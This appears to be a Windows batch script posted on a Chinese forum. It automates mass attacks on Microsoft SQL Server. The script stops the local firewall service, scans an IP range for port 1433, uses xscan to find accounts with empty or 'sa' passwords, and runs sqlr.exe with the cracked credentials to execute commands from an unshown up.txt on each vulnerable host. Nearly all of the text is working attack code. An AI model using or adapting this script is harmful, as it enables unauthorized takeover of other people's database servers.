@echo off
color 0c
@net stop sharedaccess
del log /q
set/p startip=开始IP:
set /p endip=结束IP:
set /p choice=请选择扫描:(1.syn方式扫描 2.tcp方式扫描)
if not "%Choice%"=="" set Choice=%Choice:~0,1%
if /i "%choice%"=="1" s syn %startip% %endip% 1433 /save
if /i "%choice%"=="2" s tcp %startip% %endip% 1433 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
xscan -file s.txt -sql -v -p -t 300,20
del /q names result.txt s1.txt s2.txt s.txt
ren log\s_txt_report.rlg 1.txt
rep "|OS: Unknown OS; PORT/TCP: " "" log\1.txt
rep "summary|" "" log\1.txt
rep "results|" "" log\1.txt
rep "|ms-sql-s (1433/tcp)|" "" log\1.txt
rep "HOLE|SQL-Server弱口令: " "" log\1.txt
rep "<font color=" "" log\1.txt
rep "blue" " " log\1.txt
rep "</font>" "" log\1.txt
rep "red" "" log\1.txt
rep ">" "" log\1.txt
rep "/" "" log\1.txt
rep "[" "" log\1.txt
rep "]" "" log\1.txt
setlocal enabledelayedexpansion
set "file=%file:"=%"
for %%i in ("log\1.txt") do set file=%%~fi
for /f "delims=" %%i in ('type "log\1.txt"') do (
set str=%%i
set "str=!str:"=!"
set "str=!str:空口令= ""!"
set "str=!str:口令与用户名相同= sa!"
echo !str!>>"log\1.txt"_tmp.txt
)
copy "log\1.txt" "log\1.txt"_bak.txt >nul 2>nul
move "log\1.txt"_tmp.txt "log\1.txt"
set var=0
setlocal ENABLEDELAYEDEXPANSION
for /f "tokens=*" %%a in (log\1.txt) do (
for /f "tokens=*" %%b in (log\s_txt_report_hostlist.txt) do if "%%a"=="%%b" set var=1
if !var! equ 0 echo %%a>>3.txt
set var=0
)
del log\1.txt_bak.txt
FOR /F "eol=; tokens=1,2,3 delims= " %%i in (3.txt) do @echo sqlr.exe %%i %%j %%k^<up.txt>>%%i.bat&start /MIN %%i.bat
ping -n 2 127.1>nul
FOR /F "eol=; tokens=1,2,3 delims= " %%i in (3.txt) do @del %%i.bat
del 3.txt
exit
1166
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
